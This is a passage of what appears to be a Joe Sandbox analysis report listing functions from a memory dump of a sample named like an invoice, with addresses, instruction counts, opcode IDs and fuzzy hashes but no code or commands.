                                            • Instruction Fuzzy Hash: 00115B34909224CFE721CB64D944AAC7B7AFB0B312F1011DAE54E572A2C7359D81DF50
                                            Function 0AB2D220 Relevance: .0, Instructions: 44COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 96f3af87d6e2f6567f482fab5a0c186a5b5ed476cac455819f74ed8264585251
                                            • Instruction ID: a8acfdfc3183aa0a60ed8cb0ba7bdcc028ed97bd5ff90670f2ac154635bcdd43
                                            • Opcode Fuzzy Hash: 96f3af87d6e2f6567f482fab5a0c186a5b5ed476cac455819f74ed8264585251
                                            • Instruction Fuzzy Hash: 64018C3460C284DFE755DBA8C585EA8BFF5EF4A300B1981CAD5489B2A3C730DD01EB41
                                            Function 0AB21E48 Relevance: .0, Instructions: 42COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a735426b7a8f69a63dd669878bd189f508d4b1542a98216a560f30f0100f0cca
                                            • Instruction ID: ccdbafa4951d66b64bc7b51bc0a40e72f5ae9accb8abfbb60eeb6ec63f3111d8
                                            • Opcode Fuzzy Hash: a735426b7a8f69a63dd669878bd189f508d4b1542a98216a560f30f0100f0cca
                                            • Instruction Fuzzy Hash: 0B015731E01209EBEB18EB64E8486EDBBB2EF84300F10456AE5067B364DB715944DB80
                                            Function 0AB2D1AA Relevance: .0, Instructions: 42COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c40f0ba5447d9007744cba76bcd63fac53da6db64b0c635f58d4275472ddeea8
                                            • Instruction ID: e6d43a78a52b705b3d53c386f0a417bab041d8153f97caf9e1f154754df40c43
                                            • Opcode Fuzzy Hash: c40f0ba5447d9007744cba76bcd63fac53da6db64b0c635f58d4275472ddeea8
                                            • Instruction Fuzzy Hash: E601AD3091C294EFF719CF65C540AB9BBB9AF5A301B04A6EAD40C9B152C7309A06FB40
                                            Function 0AB2D230 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 98fb9ab1bae4c04bccfd48c0d31cc15578b47e196b6dc200d60930a0f1857d0b
                                            • Instruction ID: 346bfb27950f16ae305a0c31ded1cb1177129cb824799348d732cde1c75c02dc
                                            • Opcode Fuzzy Hash: 98fb9ab1bae4c04bccfd48c0d31cc15578b47e196b6dc200d60930a0f1857d0b
                                            • Instruction Fuzzy Hash: FC012834A08108EFE744DBA8C545AACBBFAEB89300F1580D5E90C9B256D630DE40EB40
                                            Function 0AB2D1B8 Relevance: .0, Instructions: 39COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6d2ceb4e6319b3655446421f80eed760d821f556fdbba0837bf1c690ae2cad03
                                            • Instruction ID: b37661762dc68b98451f2d0ff9628751a0df89a72c2bd9f224e02956d6022e47
                                            • Opcode Fuzzy Hash: 6d2ceb4e6319b3655446421f80eed760d821f556fdbba0837bf1c690ae2cad03
                                            • Instruction Fuzzy Hash: D9F04F3090C218EFF718CF55C940ABDBBBDAB4A301F10D2EA940D5B252D7709A41FB80
                                            Function 0AB21FF0 Relevance: .0, Instructions: 38COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 192b905dcfea0262fff29cfaf549323d94b5fb79f49225e86b7c999584f14ed8
                                            • Instruction ID: 246efa8111eefa9e233482511c87c59990f5dc76fb7355c3632344bd81936ae4
                                            • Opcode Fuzzy Hash: 192b905dcfea0262fff29cfaf549323d94b5fb79f49225e86b7c999584f14ed8
                                            • Instruction Fuzzy Hash: D7F024738000282BEF64CA44C841FE3BBA4EB20214F4E44DAD44CCB222F122D912EB84
                                            Function 0AB2EA87 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b8a611b0d3a14646bea9c0f1e672175ac7f165de0fb6f29cd5a77730da271661
                                            • Instruction ID: 94f9c9acc9c6d0ae2d62272c698e70bf72def689461e422a4ac1bbcd2d7bd771
                                            • Opcode Fuzzy Hash: b8a611b0d3a14646bea9c0f1e672175ac7f165de0fb6f29cd5a77730da271661
                                            • Instruction Fuzzy Hash: D9115774A05328CFDBA09F24C854BA9BBB3FB85240F0091D9E90E96358CB704E89DF52
                                            Function 0AB27E38 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8196719d2f5dc94d6f85a40675b1e54d389255ab4d951947be298157f7e14b73
                                            • Instruction ID: fa5ccec65c9ec7f8881b30c64e37f801e2b9ad5c250716d7cb09756b82e08ade
                                            • Opcode Fuzzy Hash: 8196719d2f5dc94d6f85a40675b1e54d389255ab4d951947be298157f7e14b73
                                            • Instruction Fuzzy Hash: A7F05E326051187FEF04EF58DC51A9A7FA9DB08210F1481ABE408E7221DB31DA519B54
                                            Function 0AB23BBE Relevance: .0, Instructions: 34COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a8d00cdd07f88ee8104b6f3e72f0a47e18b662bed65c9b0d1816a31d9227a09a
                                            • Instruction ID: 4ccdc4d601fe2f9dde20c2d80754d4285b99e0e6b5fe0c036cb6de892ecde544
                                            • Opcode Fuzzy Hash: a8d00cdd07f88ee8104b6f3e72f0a47e18b662bed65c9b0d1816a31d9227a09a
                                            • Instruction Fuzzy Hash: 76F09035218024EBE7549EA9D805B7677BAEBC8651B1084AAE00ECB384DE399C02A750
                                            Function 0AB23BD0 Relevance: .0, Instructions: 33COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c95db00ba96c8fa4b14fac33f5a7f370fb2fd88ffd9b04bad79671a1dcb3c03
                                            • Instruction ID: a983af77331ad8e504ead00abbbf0bbf1cc549790e5c9417aaaea7d53d599aa1
                                            • Opcode Fuzzy Hash: 6c95db00ba96c8fa4b14fac33f5a7f370fb2fd88ffd9b04bad79671a1dcb3c03
                                            • Instruction Fuzzy Hash: D0F0822431C164FBA6546A5A94049377BFAD7C4660B1084ABF50FCF385DE369C03A7A0
                                            Function 0AB28790 Relevance: .0, Instructions: 33COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 72dc419978107c9c920baa805d04751d06400811ea4c0f58cc071e0ad67576d5
                                            • Instruction ID: e9c28e0dd1fed2da647d2c14ebbf9a56ebd174de4ea94636e5df3444cb659496
                                            • Opcode Fuzzy Hash: 72dc419978107c9c920baa805d04751d06400811ea4c0f58cc071e0ad67576d5
                                            • Instruction Fuzzy Hash: ECF012B0D1425ADFDB44DFA8C5016AEBFF0EB08300F1189AAD518EB251D7348645CF91
                                            Function 0AB23E35 Relevance: .0, Instructions: 32COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: de061263df0acd4a06be1eb9bb404611af0567d8a01874d95b7cec0364d2d910
                                            • Instruction ID: 7a2b32a537c3947d76e8ba07d306e90e3572c78ecd23cc1c8f28a859c24b360b
                                            • Opcode Fuzzy Hash: de061263df0acd4a06be1eb9bb404611af0567d8a01874d95b7cec0364d2d910
                                            • Instruction Fuzzy Hash: D9018074D042599FDB54DFD4C98099CBBB1EF48350B14849A981AAF309D736A94BDF10
                                            Function 0AB2EDD7 Relevance: .0, Instructions: 30COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c56e1a3dbee6a79895334cff7f794cf59a0e2c73d46f7873c3bc51e6f8709442
                                            • Instruction ID: e861e8377cbef072a70292bffda421b58ec7411a2b1c77cd8c26ed1dec711647
                                            • Opcode Fuzzy Hash: c56e1a3dbee6a79895334cff7f794cf59a0e2c73d46f7873c3bc51e6f8709442
                                            • Instruction Fuzzy Hash: C3F0377490665A8FCB00DFD8C99099DBBB2FB45340F106299E416AF39DDA705C06CB40
                                            Function 0AB287A0 Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 282bdd368e76301556ed95fcc96e045b30dccc480329826945eb36d00d638e86
                                            • Instruction ID: 3d56751700acc541a8eda7f4c8d98cc73789612535a2ac1876888af8cfb85464
                                            • Opcode Fuzzy Hash: 282bdd368e76301556ed95fcc96e045b30dccc480329826945eb36d00d638e86
                                            • Instruction Fuzzy Hash: 15F0DAB0D0421A9FEB54DFA9C841AAEBFF4EB48300F1085AAD518E7200E77495018F90
                                            Function 0AB21DD8 Relevance: .0, Instructions: 28COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61eaf218acca196b0466e08c6a0fd18d1c35848a8fe4c52f65931e6e481137c1
                                            • Instruction ID: 2460b8967650ba264376d8ddd47c7da079dc9c5428aae7cd35c9f0acec5ff6ba
                                            • Opcode Fuzzy Hash: 61eaf218acca196b0466e08c6a0fd18d1c35848a8fe4c52f65931e6e481137c1
                                            • Instruction Fuzzy Hash: E1E0D832700028675F1E7E5DB8048FE3A5BEBD4620B10441BF918C6350CF718D62B7D5
                                            Function 0AB2C85F Relevance: .0, Instructions: 27COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9114bfa3882a94af888ccaca77b229cc23fbe8710077a46fa716a0704f7e7a69
                                            • Instruction ID: b6c038490fc2e247dbe8635064765cffd6a0a6f7c70069011af1cccc16276f6a
                                            • Opcode Fuzzy Hash: 9114bfa3882a94af888ccaca77b229cc23fbe8710077a46fa716a0704f7e7a69
                                            • Instruction Fuzzy Hash: 08012878904268CFDBA0CF68D980B9CBBB6BB08201F1085DAE90DB3351D731AE80CF11
                                            Function 0AB2C4A4 Relevance: .0, Instructions: 27COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b33ec414e17d6514a18e1fc3b92aa1c1f5d1aac42744db48a34bf249237b413c
                                            • Instruction ID: 373990e1f097ca88453cef249e77ef23b65ffdb4e51b49bd3b12cfab1b75fa5d
                                            • Opcode Fuzzy Hash: b33ec414e17d6514a18e1fc3b92aa1c1f5d1aac42744db48a34bf249237b413c
                                            • Instruction Fuzzy Hash: 7DF08231909254DFE7119B60E495AE87F79FF4B202F0111E7E10E9B162CB369950DF51
                                            Function 0AB230F8 Relevance: .0, Instructions: 26COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c9a00cae7e2bc801ff6e8c60c8d04db77469dd50c46e33e7ca5a2840cf7486b
                                            • Instruction ID: 499a0bb5d201a7ea1c8c8b52571d9be972e7e861c07fb3e1eb24b5c062ca79a3
                                            • Opcode Fuzzy Hash: 6c9a00cae7e2bc801ff6e8c60c8d04db77469dd50c46e33e7ca5a2840cf7486b
                                            • Instruction Fuzzy Hash: D8E06530B04114EBE714AE69C45845ABBB6DBC8350F048469E4066B3C4DF355C0687D1
                                            Function 0AB2CE98 Relevance: .0, Instructions: 25COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e6829bb57bf8e800928ad4e3d32a393c02b3809d58d57df74b461b793ec6b83
                                            • Instruction ID: 3d80c244564854e8e980f05c2db05b80373548a9afd98665b9cf27d22436b327
                                            • Opcode Fuzzy Hash: 6e6829bb57bf8e800928ad4e3d32a393c02b3809d58d57df74b461b793ec6b83
                                            • Instruction Fuzzy Hash: 79E04630C6C120E9FB608E1698184FDBFBCAB8F289300A0C7804E500229778164AAB82
                                            Function 0AB24211 Relevance: .0, Instructions: 25COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bfcc883f916e09b999554f7f29bd04b76fb943354330306aa2d9f53bdecb7a5e
                                            • Instruction ID: e53b5b51e67b7a1f7e85ad84dedc5da05415a1ec2f51a80fdecf9a13be3cead4
                                            • Opcode Fuzzy Hash: bfcc883f916e09b999554f7f29bd04b76fb943354330306aa2d9f53bdecb7a5e
                                            • Instruction Fuzzy Hash: 78E0C73E63D0B8F7B77484A369122346D69C761A02B0108EBA80FC7D80E81949813313
                                            Function 0AB2CEEA Relevance: .0, Instructions: 24COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 681f19bcc7d0c5928067d0251c57f79e39f6caa328aae24b224cb1da2c0e8ac7
                                            • Instruction ID: 241301d86888426e2375638b0c206e411fce5881d6ddec3bfc0ed0a651bdd180
                                            • Opcode Fuzzy Hash: 681f19bcc7d0c5928067d0251c57f79e39f6caa328aae24b224cb1da2c0e8ac7
                                            • Instruction Fuzzy Hash: CCE09A30868214EFE7658E6180484FE3FBDEB8B244B0090D6E84E46122CB7C884AEF41
                                            Function 0AB2873A Relevance: .0, Instructions: 24COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d516d33fec1f4638f225f4cd4d1c984d5acea2802ccf6a02852142d938ebc41a
                                            • Instruction ID: 1b2b191354677bf135554e8245b6532b4c76415cdd56fee69950b10f796ba7a3
                                            • Opcode Fuzzy Hash: d516d33fec1f4638f225f4cd4d1c984d5acea2802ccf6a02852142d938ebc41a
                                            • Instruction Fuzzy Hash: 22E0ED708542929FD711CFA8D4416CABFB0AF09324F2886D6D0688A263E73842429B40
                                            Function 0AB2FDD8 Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9a852549e9f97a58d7612eb1d6e0116b6e1c6b0ccb9472bb105d8b89059ba7cd
                                            • Instruction ID: cfb227f13a82180dff157ccb0dac0e41d1953064a14edaf53101b8342ec81803
                                            • Opcode Fuzzy Hash: 9a852549e9f97a58d7612eb1d6e0116b6e1c6b0ccb9472bb105d8b89059ba7cd
                                            • Instruction Fuzzy Hash: 63F03974E0024CEBEB05EFA8D40879DBFB5EB48300F00C1AAE908A3350D7745A50EF41
                                            Function 0AB24A02 Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b39c10f60cdf3717e1be45c05595a5fba063eea0de4bf1edb1c31566930bb49
                                            • Instruction ID: 2e5497cd05db9cedc658ab0194f3d207c991801ed3527bff7ebcd935a72fdcdf
                                            • Opcode Fuzzy Hash: 1b39c10f60cdf3717e1be45c05595a5fba063eea0de4bf1edb1c31566930bb49
                                            • Instruction Fuzzy Hash: E4D0C2202180A4BBA224E988E8508B27369C78635570080EB900E8BB80CAA6ED42A398
                                            Function 0AB2C5A4 Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8f97f5b562621688bdc5ebea1841429d0c82ee6f26e445d587ecd7da0870bb7a
                                            • Instruction ID: c78969b03efdc21523d8ad8531bb6471e1475d4ca7d6be218531261cc0c55d51
                                            • Opcode Fuzzy Hash: 8f97f5b562621688bdc5ebea1841429d0c82ee6f26e445d587ecd7da0870bb7a
                                            • Instruction Fuzzy Hash: 87E0DF31808218DFE3108B50E855AA87B78FF0B201F0015E3E51E8F266C7315500DF61
                                            Function 0AB24220 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 35e742cdb3a95c080bce28b7dfdb4c873c6077b992fa6b56dfef2f1e57b0c825
                                            • Instruction ID: 3cf4d9180dd28e160e962864d25102db0f8f1b4e42665292e2bb4612f28ac47b
                                            • Opcode Fuzzy Hash: 35e742cdb3a95c080bce28b7dfdb4c873c6077b992fa6b56dfef2f1e57b0c825
                                            • Instruction Fuzzy Hash: D8D0A92C23C075F37B3888A73415234A8A9C384602B0008EB610FC7D84E81148813317
                                            Function 0AB24A08 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a4030e2d0b30c3f7e1583a1a6507063e60b8de89a9e0bca4d9096dd890305d7
                                            • Instruction ID: 8ea33dfd9f8551c4062e401f327d30b233409b180dea71801fada928f593985b
                                            • Opcode Fuzzy Hash: 5a4030e2d0b30c3f7e1583a1a6507063e60b8de89a9e0bca4d9096dd890305d7
                                            • Instruction Fuzzy Hash: 40D05B303180A4FBA224E988E450472735DD78635571084F7950F4B745CD72AD42B3D9
                                            Function 0AB25076 Relevance: .0, Instructions: 18COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0d407ea0c3b0961fb4be83879289bc1ab6087fa696c6c54a467e042c4c7f2e61
                                            • Instruction ID: e227a7b075bfeb50b980b0d6a321154c5b987b020be376c1f6d19ec32204f28d
                                            • Opcode Fuzzy Hash: 0d407ea0c3b0961fb4be83879289bc1ab6087fa696c6c54a467e042c4c7f2e61
                                            • Instruction Fuzzy Hash: 2CD05E71E05028AB9B20DAA4E8444EEBB34E74A312B001563D11BE7500C7340812DB54
                                            Function 0AB28748 Relevance: .0, Instructions: 18COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 813a4751622935fae9f968f365842a12d4544048701e61f544e7d63eea4118b5
                                            • Instruction ID: 86465a751284c9bb3ffa26818dd90a0fe14f5ee887e7ee2b205b6314b1b90efc
                                            • Opcode Fuzzy Hash: 813a4751622935fae9f968f365842a12d4544048701e61f544e7d63eea4118b5
                                            • Instruction Fuzzy Hash: A5E0B6B0D40219EFD740EFB9C945A5EBBF0BF08700F1189AAD019E7222EB749A059F91
                                            Function 0AB23C2F Relevance: .0, Instructions: 17COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 56f4a914a187f1b287a5d347ede6179b6ab50f4e2847b1dcd59cea49a8d99f95
                                            • Instruction ID: 557dd5327bb8ddb6801360429b3db2aa2bfda5490560bc25228933f3342e5c40
                                            • Opcode Fuzzy Hash: 56f4a914a187f1b287a5d347ede6179b6ab50f4e2847b1dcd59cea49a8d99f95
                                            • Instruction Fuzzy Hash: 3DD0A9B280A218F7EA50EA55C82A3AD73ECC740300F8402D2C80EAB302DA385E0073D2
                                            Function 0AB21D98 Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d030e32d16bee478b49837c5b1b18407e06f05a72de6ff924c7beb0b17f2b173
                                            • Instruction ID: a45bf40e068d443fa1320598ca4e5342e40987b89beb4667c1bb755cafa34e3f
                                            • Opcode Fuzzy Hash: d030e32d16bee478b49837c5b1b18407e06f05a72de6ff924c7beb0b17f2b173
                                            • Instruction Fuzzy Hash: E5D09E3250162CBBDF01DE88E844EDE7B69FF052A0F05C466FE185B211C7729961ABE5
                                            Function 0AB23E56 Relevance: .0, Instructions: 15COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
